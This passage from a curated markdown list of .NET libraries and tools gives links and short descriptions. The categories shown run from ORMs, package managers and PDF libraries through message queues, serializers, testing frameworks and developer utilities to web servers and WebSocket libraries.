* [MicroLite ORM](https://github.com/MicroLite-ORM/MicroLite) MicroLite ORM is a micro Object Relational Mapper for the .NET framework. It is designed to be easy to use, extensible and testable.
* [PetaPoco](https://github.com/CollaboratingPlatypus/PetaPoco) - A tiny ORM-ish thing for your POCOs
* [AsyncPoco](https://github.com/tmenier/AsyncPoco) - A long-"awaited" fully asynchronous PetaPoco fork
* [NPoco](https://github.com/schotime/NPoco) - Simple microORM that maps the results of a query onto a POCO object. Based on Schotime's branch of PetaPoco
* [Limebean](https://github.com/Nick-Lucas/LimeBean) - Hybrid ORM which uses SQL fragments and doesn't require Model Classes.
* [LLBLGen Pro](https://www.llblgen.com) - Entity Modeling solution for Entity Framework, NHibernate, Linq to SQL and its own ORM framework: LLBLGen Pro Runtime Framework. **[$][Free Lite version]**
* [Insight.Database](https://github.com/jonwagner/Insight.Database) - Insight.Database is a fast, lightweight, micro-ORM for .NET
* [DbExtensions](https://maxtoroq.github.io/DbExtensions/) - Data-access framework with a strong focus on query composition, granularity and code aesthetics.
* [SmartSql](https://github.com/dotnetcore/SmartSql) - SmartSql = MyBatis + Cache(Memory | Redis)+ ZooKeeper + R / W Splitting + Dynamic Repository ....
* [RepoDb](https://github.com/mikependon/RepoDb) - A hybrid ORM library for .NET.
* [Venflow](https://github.com/TwentyFourMinutes/Venflow) - A super fast and lightweight ORM for PostgreSQL.
* [MongoFramework](https://github.com/TurnerSoftware/MongoFramework) - An "Entity Framework"-like interface for MongoDB
## Package Management
* [NuGet](https://www.nuget.org/) - The .NET package manager
* [BaGet](https://github.com/loic-sharma/BaGet/) - A cross-platform, lightweight NuGet and Symbol server
* [Cloudsmith](https://cloudsmith.com/nuget-feed/) - A fully managed package management SaaS, with support for NuGet, Npm, Docker and much more. **[Free for Public/OSS]** **[$]**
* [MyGet](https://www.myget.org/) - Hosted Package Repository for NuGet, NPM, Bower and VSIX. Also provides CI as-a-Service. **[$]**
* [Paket](https://github.com/fsprojects/Paket) - A package dependency manager for .NET with support for NuGet packages and GitHub repositories. https://fsprojects.github.io/Paket/
* [Sleet](https://github.com/emgarten/sleet/) - A NuGet v3 static feed generator with support for AWS S3 and Azure Storage
## PDF
* [Cloudmersive PDF](https://cloudmersive.com/pdf-api) - Cloudmersive PDF is a native .NET Framework and .NET Core NuGet library and API service that can create, modify, encrypt or convert PDF documents at high scale and fidelity; and is free to use with no expiration **[Free]**
* [Docotic.Pdf](https://bitmiracle.com/pdf-library/) - PDF library to create, read, edit, draw, and print PDF documents in .NET and .NET Core applications. 100% managed, without unsafe blocks. **[$]** **[[Free for OSS](https://bitmiracle.com/pdf-library/free-pdf-library.aspx)]**
* [ITextSharp](https://github.com/itext/itextsharp) - iText is a PDF library that allows you to CREATE, ADAPT, INSPECT and MAINTAIN documents in the Portable Document Format (PDF)**[$]** **[Free for OSS]**
* [PdfiumViewer](https://github.com/pvginkel/PdfiumViewer) - PdfiumViewer is a PDF viewer based on the PDFium project.
* [WkhtmlToPdf](https://github.com/codaxy/wkhtmltopdf) - C# wrapper around wkhtmltopdf console utility. Allow to generate preety PDF using HTML and CSS.
* [Pdfium.Net SDK](https://pdfium.patagames.com/) - Advanced C# PDF library for render, create, edit, merge, split, print, and view PDFs. Open source PDF Viewer is available on [GitHub](https://github.com/patagames). A [NuGet package](https://www.nuget.org/packages/Pdfium.Net.SDK/) is also available for easy inclusion into your projects.**[$]**
* [PdfPig](https://uglytoad.github.io/PdfPig/) - Read and create and extract text and other content from PDFs in C# (port of PdfBox)
* [QuestPDF](https://www.questpdf.com/) - QuestPDF is an open-source, modern and battle-tested library that can help you with generating PDF documents by offering friendly, discoverable and predictable C# fluent API.
* [Kevsoft.PDFtk](https://github.com/kevbite/Kevsoft.PDFtk) - A wrapper to drive the awesome pdftk binary, which can fill PDF forms, get field information, concatenate multiple documents or pages, split documents, add or replace stamps, and can attach files to or download files from pages.
## Profiler
* [MiniProfiler](https://github.com/MiniProfiler/dotnet) - A simple but effective mini-profiler for ASP.NET websites
* [Glimpse](https://github.com/glimpse/glimpse) - The open source diagnostics platform for the web
* [Unchase.FluentPerformanceMeter](https://github.com/unchase/Unchase.FluentPerformanceMeter) - An open-source and cross-platform .Net Standard 2.0 library that is designed for the method’s performance measurement.
## Protocols
* [SSH.NET](https://github.com/sshnet/SSH.NET) - A Secure Shell (SSH) library for .NET, optimized for parallelism. Provides SSH commands, SFTP/SCP uploads and downloads, and SOCKS4/SOCKS5/HTTP proxies.
* [FluentFTP](https://github.com/robinrodricks/FluentFTP) - An FTP and FTPS library for .NET, optimized for speed. Provides extensive FTP commands, file uploads/downloads and FTP proxies.
* [SharpSnmpLib](https://docs.sharpsnmp.com/) - An open source SNMP implementation for .NET/Mono/Xamarin. Versioin 1, 2c, and 3 are supported.
* [DNS](https://github.com/kapetan/dns) - A library for parsing and serializing DNS messages. Includes a basic DNS client and server.
* [DnsClient.NET](https://github.com/MichaCo/DnsClient.NET) - A simple yet very powerful and high performant open source library for the .NET Framework to do DNS lookups.
* [Tecan SiLA2 SDK](https://gitlab.com/SiLA2/vendors/sila_tecan) - A library and code generator to develop SiLA2 clients and servers.
## Push Notifications
* [PushSharp](https://github.com/Redth/PushSharp) - A server-side library for sending Push Notifications to iOS, OSX, Android, Chrome, Windows Phone, Windows 8, Blackberry, and Amazon devices.
## Query Builders
* [SqlKata](https://sqlkata.com) - Elegant SQL query builder, that supports complex queries, joins, sub queries, nested where conditions, vendor engine targets and more
## Queue
* [CAP](https://github.com/dotnetcore/CAP) - An EventBus with local persistent message functionality for RabbitMQ or Kafka.
* [NServiceBus](https://github.com/Particular/NServiceBus) - The most popular service bus for .NET
* [Gofer.NET](https://github.com/brthor/Gofer.NET) - Easy C# API for Distributed Background Tasks/Jobs for .NET Core. Inspired by celery for python.
* [Hangfire](https://github.com/HangfireIO/Hangfire) - Incredibly easy way to perform fire-and-forget, delayed and recurring tasks inside ASP.NET applications
* [RabbitMQ.NET](https://github.com/rabbitmq/rabbitmq-dotnet-client) - Implementation of an AMQP client library for C#, and a binding exposing AMQP services via WCF
* [NetMQ](https://github.com/zeromq/netmq) - NetMQ is 100% native C# port of ZeroMQ
* [MassTransit](https://github.com/MassTransit/MassTransit) - MassTransit is lean service bus implementation for building loosely coupled applications using the .NET Framework.
* [Rebus](https://github.com/rebus-org/Rebus) - Rebus is a lean service bus implementation for .NET, similar in nature to NServiceBus and MassTransit, only leaner
* [RestBus](https://github.com/tenor/RestBus) - A service-oriented .NET messaging library for RabbitMQ.
* [RawRabbit](https://github.com/pardahlman/RawRabbit) - A modern .NET Core library for RabbitMQ.
* [EasyNetQ](https://github.com/EasyNetQ/EasyNetQ) - An easy to use .NET API for RabbitMQ
* [Warewolf ESB](https://github.com/Warewolf-ESB/Warewolf) - An easy to use service bus and microservices platform. Easily build applications and services in a visual IDE.
* [Confluent's .NET Client](https://github.com/confluentinc/confluent-kafka-dotnet) - Confluent's .NET Client for Apache Kafka.
* [Foundatio](https://github.com/FoundatioFx/Foundatio#queues) - A common interface with in-memory, Redis and Azure implementations.
* [Kafunk](https://github.com/jet/kafunk) - F# Kafka client from Jet
* [Brighter](https://github.com/BrighterCommand/Brighter) - Command Dispatcher, Processor, and Distributed Task Queue https://www.goparamore.io/
* [Silverback](https://silverback-messaging.net) - A simple but feature-rich message bus for .NET core (supports Kafka, RabbitMQ and MQTT).
* [SlimMessageBus](https://github.com/zarusz/SlimMessageBus) - Lightweight message bus with transports for popular messaging systems (Kafka, Redis, Azure Service Bus, and others) and in-memory communication.
## RPC
* [gRPC](https://github.com/grpc/grpc-dotnet) An RPC library and framework for .NET Core. Read more about it on [Docs Microsoft](https://docs.microsoft.com/en-us/aspnet/core/grpc)
* [CoreRPC](https://github.com/kekekeks/CoreRPC) - Extensible library for WCF-like RPC targeting netstandard1.3. Compatible with .NET, Mono and .NET Core.
* [BloomRPC](https://github.com/bloomrpc/bloomrpc) - BloomRPC aims to provide the simplest and most efficient developer experience for exploring and querying your GRPC services.
* [gRPCurl](https://github.com/fullstorydev/grpcurl) - gRPCurl is a command-line tool that lets you interact with gRPC servers. It's basically curl for gRPC servers.
* [gRPC UI](https://github.com/fullstorydev/grpcui) - gRPC UI is a command-line tool that lets you interact with gRPC servers via a browser. It's sort of like Postman, but for gRPC APIs instead of REST.
## Reactive Programming
* [Rx.NET](https://github.com/dotnet/reactive) - The Reactive Extensions (Rx) is a library for composing asynchronous and event-based programs using observable sequences and LINQ-style query operators
* [Dynamic Data](https://github.com/reactivemarbles/DynamicData) - Reactive Extensions (Rx) for collections
* [ObsevableComputations](https://github.com/IgorBuchelnikov/ObservableComputations) - A cross-platform .NET library for computations whose arguments and results are objects that implement INotifyPropertyChanged and INotifyCollectionChanged (ObservableCollection) interfaces.
## Real-time Communications
* [SIPSorcery](https://github.com/sipsorcery/sipsorcery) - A cross platform C# .NET library supporting SIP, VoIP and WebRTC.
## Regular Expression
* [RegExtract](https://github.com/sblom/RegExtract) - Clean & simple idiomatic C# RegEx-based line parser that emits strongly typed results.
## Scheduling
* [FluentScheduler](https://github.com/fluentscheduler/FluentScheduler) - Task scheduler with fluent interface that runs automated jobs from your application
* [NCrontab](https://github.com/atifaziz/NCrontab) - Class library for parsing & formatting [crontab](http://crontab.org/) expressions as well as calculating occurrences of time based on a crontab schedule
* [NCrontab.Scheduler](https://github.com/thomasgalliker/NCrontab.Scheduler) - Simple task scheduler library for scheduling NCrontab-based tasks
* [QuartzNet](https://github.com/quartznet/quartznet) - Quartz Enterprise Scheduler .NET
* [Hangfire](https://github.com/HangfireIO) - An easy way to perform fire-and-forget, delayed and recurring tasks inside .NET apps
* [Chroniton](https://github.com/leosperry/Chroniton) - A simple, fully integrable, and customizable library for running strongly typed jobs (tasks) on schedules.
* [DurableTask](https://github.com/Azure/durabletask) - This framework allows users to write long running persistent workflows in C# using the async/await capabilities.
* [Workflow Core](https://github.com/danielgerlag/workflow-core) - Lightweight embeddable workflow engine
## SDK and API Clients
* [AWS SDK](https://github.com/aws/aws-sdk-net) - The AWS SDK for .NET enables .NET developers to easily work with Amazon Web Services
* [Azure PowerShell](https://github.com/Azure/azure-powershell) - A set of PowerShell cmdlets for developers and administrators to develop, deploy and manage Microsoft Azure applications
* [Countly SDK for Windows](https://github.com/Countly/countly-sdk-windows/) - Windows SDK for Countly analytics and marketing platform for product and marketing managers
* [Octokit.NET](https://github.com/octokit/octokit.net) - A GitHub API client library for .NET
* [Dropbox.NET](https://github.com/dropbox/dropbox-sdk-dotnet) - Official .NET SDK for the Dropbox API
* [Getty Images API SDK](https://github.com/gettyimages/gettyimages-api_dotnet) - SDK for the Getty Images and iStock APIs
* [Cloudmersive APIs](https://api.cloudmersive.com/csharp-client.asp) - An API client library for .NET **[Proprietary][Free]**
## Search
* [Elasticsearch .NET](https://github.com/elastic/elasticsearch-net) - Elasticsearch.Net & NEST
* [PlainElastic.Net](https://github.com/Yegoroff/PlainElastic.Net) - Plain .NET client for ElasticSearch
* [SolrNet](https://github.com/SolrNet/SolrNet) - Solr client for .NET
* [SolrExpress](https://github.com/solr-express/solr-express) - A simple and lightweight query .NET library for Solr, in a controlled, buildable and fail fast way
* [Lucene.net](https://lucenenet.apache.org/) - Lucene.Net is a port of the Lucene search engine library, written in C# and targeted at .NET runtime users
## Serialization
* [Ceras](https://github.com/rikimaru0345/Ceras) - Ceras is a binary serializer. It converts any object into a byte[] and back. It goes above and beyond in terms of features, speed, and comfort. Supports reference loops, large/complicated inheritance chains, splitting objects into parts and more.
* [CsvExport](https://github.com/jitbit/CsvExport) - Very simple & lightweight CSV exporter, Excel friendly, escapes text & quotes etc.
* [Protobuf.NET](https://github.com/protobuf-net/protobuf-net) - Protocol buffers is the name of the binary serialization format used by Google for much of their data communications
* [Json.NET](https://github.com/JamesNK/Newtonsoft.Json) - Popular high-performance JSON framework for .NET
* [ServiceStack.Text](https://github.com/ServiceStack/ServiceStack.Text) - JSON, JSV and CSV Text Serializers used in servicestack.net
* [Msgpack-Cli](https://github.com/msgpack/msgpack-cli) - MessagePack implementation for Common Language Infrastructure
* [Jil](https://github.com/kevin-montrose/Jil) - Fast .NET JSON serializer, built on Sigil (used by StackOverflow)
* [ProtoBuf](https://github.com/SilentOrbit/protobuf) - Generate C# code for protocol buffer serialization from a .proto specification.
* [FlatSharp](https://github.com/jamescourtney/FlatSharp) - Fast, idiomatic FlatBuffers implementation. Use .fbs files or attributes.
* [F# Data](https://fsprojects.github.io/FSharp.Data/) - F# type providers for accessing XML, JSON, CSV and HTML files (based on sample documents) and for accessing WorldBank data
* [Bond](https://github.com/Microsoft/bond) - cross-platform framework for working with schematized data. It supports cross-language de/serialization and powerful generic mechanisms for efficiently manipulating data.
* [Hyperion](https://github.com/akkadotnet/Hyperion) - A high performance polymorphic serializer for the .NET framework.
* [FileHelpers](https://github.com/MarcosMeli/FileHelpers) - free and easy to use .NET library to import or export data from fixed length or delimited records in files, strings or streams.
* [FsPickler](https://github.com/mbraceproject/FsPickler) - A fast multi-format message serializer for .NET
* [Migrant](https://github.com/antmicro/Migrant) - Fast and flexible serialization framework usable on undecorated classes.
* [Utf8Json](https://github.com/neuecc/Utf8Json) - Fast and Zero Allocation JSON Serializer for C#(.NET, .NET Core, Unity and Xamarin), this serializer write/read directly to UTF8 binary so boostup performance.
* [ObjectDumper.NET](https://github.com/thomasgalliker/ObjectDumper) - Serializes in-memory object to C# code.
* [FluentSerializer](https://github.com/Marvin-Brouwer/FluentSerializer#readme) - A profile-based Serializer for multiple data-formats.
## SMS and Phone calls
* [Twilio-csharp](https://github.com/twilio/twilio-csharp) - A C#/.NET Library for sending and receiving phone calls and text messages with Twilio.
## State machines
* [Stateless](https://github.com/dotnet-state-machine/stateless) - Create state machines and lightweight state machine-based workflows directly in .NET code
* [Automatonymous](https://github.com/MassTransit/Automatonymous) - A state machine library for .NET - allows you to write fluent style state machines
* [LiquidState](https://github.com/prasannavl/LiquidState) - Efficient asynchronous and synchronous state machines for .NET
## Static Site Generators
* [FsBlog](https://github.com/fsprojects/FsBlog/) - Blog aware, static site generation using F#
* [Pretzel](https://github.com/Code52/pretzel) - A site generation tool (and then some) for .NET platforms
* [Sandra.Snow](https://github.com/Sandra/Sandra.Snow) - Jekyll-inspired static site generation for .NET
* [Wyam](https://wyam.io/) - A simple to use, highly modular, and extremely configurable static content generator
## Strong Naming
* [Strong Namer](https://github.com/dsplaisted/strongnamer) - Automatically add strong names to referenced assemblies which do not already have a strong name. This will allow you to reference and use (NuGet packages with) assemblies which are not strong named from your projects that do use a strong name.
* [.NET Assembly Strong-Name Signer](https://github.com/brutaldev/StrongNameSigner) - Utility software to strong-name sign .NET assemblies, including assemblies you do not have the source code for.
## Style Guide
* [C# Style Guide](https://stackoverflow.com/questions/4678178/style-guide-for-c) - StackOverflow Q & A on style guides
* [C# Coding Conventions](https://docs.microsoft.com/en-us/dotnet/csharp/programming-guide/inside-a-program/coding-conventions) - Official MSDN C# code conventions
* [C# Async Guidance](https://github.com/davidfowl/AspNetCoreDiagnosticScenarios/blob/master/AsyncGuidance.md) - list of problematic asynchronous patterns for .NET Core with an explanation of how to solve those issues
## Template Engine
* [RazorEngine](https://github.com/Antaris/RazorEngine) - Open source templating engine based on Microsoft's Razor parsing engine
* [RazorLight](https://github.com/toddams/RazorLight) - Open source template engine based on Microsoft's Razor parsing engine supporting .NET Standard 2.0
* [Nustache](https://github.com/jdiamond/Nustache) - Open source library for logic-less templates
* [Stubble](https://github.com/stubbleorg/stubble) - Trimmed down {{mustache}} templates in .NET. Successor of Nustache.
* [DotLiquid](https://github.com/dotliquid/dotliquid) - C# port of the Ruby Liquid templating language
* [Mustache Sharp](https://github.com/jehugaleahsa/mustache-sharp) - An extension of the mustache text template engine for .NET.
* [Scriban](https://github.com/lunet-io/scriban) - A fast, powerful, safe and lightweight text templating language and engine for .NET
* [Morestachio](https://github.com/JPVenson/morestachio) - A full sized {{mustache}} like template engine with focus on extendibility.
* [Fluid](https://github.com/sebastienros/fluid) - Fluid is an open-source .NET template engine based on the Liquid template language.
* [SmartFormat](https://github.com/axuno/SmartFormat) - A lightweight text templating library written in C# which can be a drop-in replacement for string.Format
* [Handlebars.Net](https://github.com/Handlebars-Net/Handlebars.Net) - A real .NET Handlebars engine
## Testing
* [ArchUnitNET](https://github.com/TNG/ArchUnitNET) - Simple library for checking the architecture of C# code with a fluent API.
* [NetArchTest](https://github.com/BenMorris/NetArchTest) - A fluent API for .Net Standard that can enforce architectural rules in unit tests.
* [AutoFixture](https://github.com/AutoFixture/AutoFixture) - AutoFixture is an open source framework for .NET designed to minimize the 'Arrange' phase of your unit tests
* [BDTest](https://github.com/thomhurst/BDTest/wiki) - A behaviour driven testing and reporting framework!
* [BDDfy](https://github.com/TestStack/TestStack.BDDfy) - BDDfy is the simplest BDD framework EVER!
* [Bogus](https://github.com/bchavez/Bogus) - A simple and sane fake data generator for C#. Based on and ported from the famed faker.js.
* [ExpressionToCode](https://github.com/EamonNerbonne/ExpressionToCode) - Use plain C# syntax in assertions that include both the expression expression and subexpression values in the failure message.
* [FakeItEasy](https://github.com/FakeItEasy/FakeItEasy) - The easy mocking library for .NET https://fakeiteasy.github.io
* [Fluent Assertions](https://github.com/fluentassertions/fluentassertions) - A set of .NET extension methods that allow you to more naturally specify the expected outcome of a TDD or BDD-style test
* [FluentAutomation](https://github.com/stirno/FluentAutomation) - Simple Fluent API for UI Automation
* [FsCheck](https://github.com/fscheck/FsCheck) - Random Testing for .NET.
* [Fuchu](https://github.com/mausch/Fuchu) - A unit-testing library for F# with tests-as-values which makes DSLs extremely easy to create.
* [Machine.Specifications](https://github.com/machine/machine.specifications) - Machine.Specifications (MSpec) is a context/specification framework that removes language noise and simplifies tests.
* [Moq](https://github.com/Moq/moq4) - The most popular and friendly mocking framework for .NET
* [Moq.Contrib.HttpClient](https://github.com/maxkagamine/Moq.Contrib.HttpClient) - A set of extension methods for mocking HttpClient and IHttpClientFactory with Moq.
* [NBomber](https://github.com/PragmaticFlow/NBomber) - Very simple load testing framework for Pull and Push scenarios. It's 100% written in F# and targeting .NET Core and full .NET Framework.
* [NBuilder](https://github.com/garethdown44/nbuilder) - Rapid generation of test objects
* [NCrunch](https://www.ncrunch.net/) - An automated continuous & concurrent testing tool for Visual Studio. **[$]**
* [NFluent](http://www.n-fluent.net) - NFluent is an assertion library which aims to fluent your .NET TDD experience.
* [NSubstitute](https://nsubstitute.github.io/) - A friendly substitute for .NET mocking frameworks
* [NUnit](https://github.com/nunit/nunit) - A unit-testing framework for all .NET languages
* [Rhino Mocks](https://github.com/ayende/rhino-mocks) - Dynamic Mocking Framework for .NET
* [Testcontainers](https://github.com/testcontainers/testcontainers-dotnet) - A library to support tests with throwaway instances of Docker containers for all compatible .NET Standard versions.
* [SecTester](https://github.com/NeuraLegion/sectester-net) - SecTester is a new tool that integrates [Bright](https://brightsec.com/) enterprise-grade scan engine directly into your integration or e2e tests. **[Proprietary]** **[Free]**
* [Shouldly](https://github.com/shouldly/shouldly) - Shouldly is an assertion framework which focuses on giving great error messages when the assertion fails while being simple and terse.
* [Snapshooter](https://github.com/SwissLife-OSS/snapshooter) - A snapshot testing tool for .NET Core and .NET Framework
* [SpecFlow](https://github.com/SpecFlowOSS/SpecFlow) - Binding business requirements to .Net code
* [Stryker.NET](https://github.com/stryker-mutator/stryker-net) - Mutation testing for .NET Core projects
* [xBehave.net](https://github.com/xbehave/xbehave.net) - An xUnit.net extension for describing your tests using natural language.
* [xUnit.net](https://github.com/xunit/xunit) - A free, open source, community-focused unit testing tool for the .NET Framework.
* [Canopy](https://github.com/lefthandedgoat/canopy) - Canopy is a free, open source F# web automation and testing framework
* [Expecto](https://github.com/haf/expecto) - A smooth testing framework for F# with tests as values. Unit testing, property based testing, performance testing and stress testing.
* [ReportPortal](https://reportportal.io) - AI-powered Test Automation Dashboard. Acquire, aggregate and analyze test reports to ascertain release health.
* [Compare-Net-Objects](https://github.com/GregFinzer/Compare-Net-Objects) - Perform a deep compare of any two .NET objects using reflection. Shows the differences between the two objects.
* [Verify](https://github.com/VerifyTests/Verify) - Verification tool to enable simple approval of complex models and documents.
* [CsCheck](https://github.com/AnthonyLloyd/CsCheck) - Random testing library for C#. Including concurrency, causal profiling, regression and performance testing.
## Tools
* [Downloader](https://github.com/bezzad/Downloader) - Fast and reliable multipart downloader with asynchronous progress events for .NET applications.
* [Fiddler](https://www.telerik.com/fiddler) - The free web debugging proxy for any browser, system or platform
* [Open Live Writer](https://github.com/OpenLiveWriter/OpenLiveWriter) - Blog writer which integrated with WordPress, Blogger, et. al. Open Live Writer makes it easy to write, preview, and post to your blog.
* [CodeHub](https://github.com/CodeHubApp/CodeHub) - CodeHub is the best way to browse and maintain your GitHub repositories on any iOS device!
* [ShareX](https://github.com/ShareX/ShareX) - ShareX is a free and open source program that lets you capture or record any area of your screen and share it with a single press of a key. It also allows uploading images, text or other types of files to over 80 supported destinations you can choose from.
* [Myrtille](https://github.com/cedrozor/myrtille) - A native HTML4/5 Remote Desktop Protocol client, HTTP gateway written in C# for .NET
* [Opserver](https://github.com/Opserver/Opserver) - Stack Exchange's Monitoring System
* [CatLight](https://catlight.io) - Build status notifications for TFS/Jenkins/Travis/Appveyor. Cross-platform desktop app based on .NET Core and Electron. **[Free][Proprietary]**
* [Mockaco](https://github.com/natenho/Mockaco/) - API mock server with fast setup, useful to simulate HTTP responses, leveraging ASP.NET Core features, built-in fake data generation and C# scripting engine powered by Roslyn scripting API.
* [Netling](https://github.com/hallatore/Netling) - A load tester client for easy web testing. It is extremely fast while using little CPU or memory.
* [Papercut](https://github.com/ChangemakerStudios/Papercut-SMTP) - Papercut is an open source (.NET based) test email viewer that runs locally with a built-in SMTP server designed to receive and notify of test email messages.
* [Visual Studio Uninstaller](https://github.com/Microsoft/VisualStudioUninstaller) - Uninstall and clean up all components of Visual Studio.
* [Fake JSON Server](https://github.com/ttu/dotnet-fake-json-server) - Fake REST API for prototyping or as a CRUD Back End. No need to define types, uses dynamic typing. Data is stored to a single JSON file. Has authentication, WebSocket notifications, async long running operations, random generation for errors/delays and experimental GraphQL support.
* [posh-dotnet](https://github.com/bergmeister/posh-dotnet) - `PowerShell` tab completion for the [dotnet CLI](https://github.com/dotnet/cli)
* [SmartCode](https://github.com/dotnetcore/SmartCode) - SmartCode = IDataSource -> IBuildTask -> IOutput => Build Everything!!! (Including [**Code generator**])
* [NETworkManager](https://github.com/BornToBeRoot/NETworkManager) - A powerful tool for managing networks and troubleshoot network problems!
* [AnyStatus](https://www.anystat.us) - A desktop notifications app for monitoring CI/CD pipelines, servers, network, health and metrics. AnyStatus supports Azure DevOps, Jenkins, TeamCity, AppVeyor and more.
* [OctoLinker](https://github.com/OctoLinker/OctoLinker) - Navigate through `project.json`, `packages.config`, `*.props`, `*.targets`, and C#/F#/VB.NET project files efficiently with the OctoLinker browser extension for GitHub.
* [YARP](https://github.com/microsoft/reverse-proxy) - YARP is a reverse proxy toolkit for building fast proxy servers in .NET using the infrastructure from ASP.NET and .NET.
* [JSON Formatter and Validator](https://elmah.io/tools/json-formatter/) - A blazing fast JSON formatter and validator that won't share JSON with a server.
* [CSharpier](https://github.com/belav/csharpier) - An opinionated code formatter for c# that is based on the [Prettier](https://github.com/prettier/prettier) printing process.
* [UnitsNet](https://github.com/angularsen/UnitsNet) - Makes life working with units of measurement just a little bit better.
* [Another Redis Desktop Manager](https://github.com/qishibo/AnotherRedisDesktopManager) - A faster, better and more stable redis desktop manager [GUI client], compatible with Linux, Windows, Mac. What's more, it won't crash when loading massive keys.
## Trading
* [Lean](https://github.com/QuantConnect/Lean) - Lean Engine is an open-source fully managed C# algorithmic trading engine built for desktop and cloud usage. https://www.quantconnect.com/lean/
* [StockSharp](https://github.com/StockSharp/StockSharp) - Trading and algorithmic trading open source platform (stock markets, forex, bitcoins and options). https://stocksharp.com
## UI Automation
* [Atata](https://github.com/atata-framework/atata) - Automated web testing full featured framework based on Selenium WebDriver.
* [Managed Windows API](http://mwinapi.sourceforge.net/) - Introspect and automate third-party Windows / VC++ applications without needing its source code.
* [FlaUI](https://github.com/FlaUI/FlaUI) - FlaUI is a .NET library which helps with automated UI testing of Windows applications (Win32, WinForms, WPF, Store Apps, ...).
* [PuppeteerSharp](https://github.com/hardkoded/puppeteer-sharp) - Puppeteer Sharp is a .NET port of the official Node.JS Puppeteer API.
* [PuppeteerSharp.Contrib](https://github.com/hlaueriksson/puppeteer-sharp-contrib) - Contributions to Puppeteer Sharp that provides a convenient way to write readable and robust browser tests.
## Visual Studio Plugins
* [Web Essentials](https://github.com/madskristensen/WebEssentials2019) - Web Essentials extends Visual Studio with lots of new features that web developers have been missing for many years
* [VsVIM](https://github.com/VsVim/VsVim) - VIM in Visual Studio
* [Nuget Package Manager](https://marketplace.visualstudio.com/items?itemName=NuGetTeam.NuGetPackageManager) - NuGet is the package manager for the Microsoft development platform including .NET
* [SideWaffle](https://github.com/ligershark/side-waffle) - A collection of Item Templates for Visual Studio 2012/2013/2015 that makes any web developer's life much easier
* [Resharper](https://www.jetbrains.com/resharper/) - Developer Productivity Tool for Visual Studio **[$]**
* [CodeContracts](https://github.com/Microsoft/CodeContracts) - Source code for the CodeContracts tools for .NET
* [Git Diff Margin](https://github.com/laurentkempe/GitDiffMargin) - Displays live Git changes of the currently edited file on Visual Studio margin and scroll bar
* [Productivity Power Tools](https://marketplace.visualstudio.com/items?itemName=VisualStudioPlatformTeam.ProductivityPowerTools) - A set of extensions to Visual Studio Professional (and above) which improves developer productivity.
* [Tabs Studio](https://tabsstudio.com/) - Visual Studio tab manager with multiple tab rows, tab coloring and tab grouping. **[$]**
* [VSColorOutput](https://marketplace.visualstudio.com/items?itemName=MikeWard-AnnArbor.VSColorOutput) - Color highlighting for Build, Find and Debug output windows. Custom match patterns and colors can be added.
* [CodeLineage](https://marketplace.visualstudio.com/items?itemName=HippoCampSoftwareLtd.CodeLineage) - Easy access to a cumulative diff view between file revisions (supports svn, git, mercurial, perforce).
* [OzCode](https://marketplace.visualstudio.com/items?itemName=CodeValueLtd.OzCode) - OzCode is a Visual Studio Extension which cuts down on debugging time and increases productivity by detecting and isolating bugs, making them easy to fix. **[$]**
* [ViEmu](http://www.viemu.com/) - very powerful Vi/vim emulator for Visual Studio supporting all basic and many advanced features of vi/vim. **[$]**
* [Roslynator](https://github.com/JosefPihrt/Roslynator) - A collection of 500+ analyzers, refactorings and fixes for C#, powered by Roslyn
* [Unchase.Odata.Connectedservice](https://github.com/unchase/Unchase.Odata.Connectedservice) - A Visual Studio Connected Service for generating API client code in C# or VB for OData web service.
* [Unchase.OpenAPI.Connectedservice](https://github.com/unchase/Unchase.OpenAPI.Connectedservice) - A Visual Studio 2017/2019 extension to generate C# (TypeScript) HttpClient (or C# Controllers) code for OpenAPI web service with [NSwag](https://github.com/RicoSuter/NSwag).
* [SonarSource.sonarlint-visualstudio](https://github.com/SonarSource/sonarlint-visualstudio) - SonarLint is a free, open source Visual Studio 2017, 2019 and 2022 extension that provides on-the-fly feedback to developers on new bugs and quality issues in C#, VB.NET, C/C++, TypeScript and JavaScript.
## Web Browsers
* [CefSharp](https://github.com/cefsharp/CefSharp/) - HTML5, CSS3 and JS web browser powered by Chromium, for WinForms and WPF
## Web Frameworks
* [ASP.NET MVC](https://dotnet.microsoft.com/apps/aspnet) - ASP.NET is a free web framework for building great web sites and applications
* [Coalesce](https://coalesce.intellitect.com/) - Coalesce is a framework for rapid-development of ASP.NET Core web applications.
* [FubuMVC](https://github.com/DarthFubuMVC/fubumvc) - A front-controller style MVC framework for .NET
* [NancyFx](https://github.com/NancyFx/Nancy) - Lightweight, low-ceremony, framework for building HTTP-based services on .NET and Mono
* [IISNode](https://github.com/tjanczuk/iisnode) - Host Node.js applications in IIS
* [Suave.IO](https://suave.io/) - Framework/library/web server that makes you cry tears of joy after finishing your project ahead-of-time when you look at the beautiful code you've written in F#.
* [DotVVM](https://github.com/riganti/dotvvm) - MVVM framework for people who don't like to write JavaScript, with OWIN and ASP.NET Core support and a free extension for Visual Studio 2015 and 2017.
* [Giraffe](https://github.com/giraffe-fsharp/Giraffe) - Functional (F#) ASP.NET Core micro framework for building rich web applications
## Web Servers
* [EmbedIO](https://github.com/unosquare/embedio) - Web server built on Mono and cross-platform
* [XSP](https://github.com/mono/xsp) - Mono's ASP.NET hosting server. This module includes an Apache Module, a FastCGI module that can be hooked to other web servers as well as a standalone server used for testing (similar to Microsoft's Cassini)
## WebSocket
* [Fleck](https://github.com/statianzo/Fleck) - Fleck is a WebSocket server implementation in C#. Branched from the Nugget project
* [SignalR](https://github.com/SignalR/SignalR) - Library for ASP.NET developers that makes it incredibly simple to add real-time web functionality to your applications
* [SuperSocket](https://github.com/kerryjiang/SuperSocket) - SuperSocket is a light weight extensible socket application framework
* [Websocket-Sharp](https://github.com/sta/websocket-sharp) - A C# implementation of the WebSocket protocol client and server
* [WebSocket4NET](https://archive.codeplex.com/?p=websocket4net) - WebSocket client for .NET 2.0+, Xamarin, Mono, Silverlight, Windows Phone, & WinRT
* [Crossertech](https://crosser.io/) - Provides a great set of tools for you to build real-time applications on the Microsoft.NET plattform and much more. **[$]**
* [WampSharp](https://github.com/Code-Sharp/WampSharp) - A C# implementation of [The Web Application Messaging Protocol](https://wamp-proto.org/) - a protocol that provides messaging patterns of Remote Procedure Calls and Publish/Subscribe over WebSockets.
* [NetGain](https://github.com/StackExchange/NetGain) - A high performance WebSocket server library powering Stack Overflow.
* [Websockets.PCL](https://github.com/NVentimiglia/Websockets.PCL) - WebSockets.PCL is a portable class library, profile 259, C# WebSocket implementation.
